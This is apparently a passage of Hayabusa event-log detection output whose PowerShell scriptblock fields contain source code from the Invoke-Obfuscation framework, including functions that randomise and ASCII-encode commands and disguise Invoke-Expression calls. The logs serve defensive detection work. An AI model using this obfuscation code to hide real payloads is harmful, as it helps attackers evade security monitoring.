'*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). 
$JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' 
'*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. 
$RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. 
Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
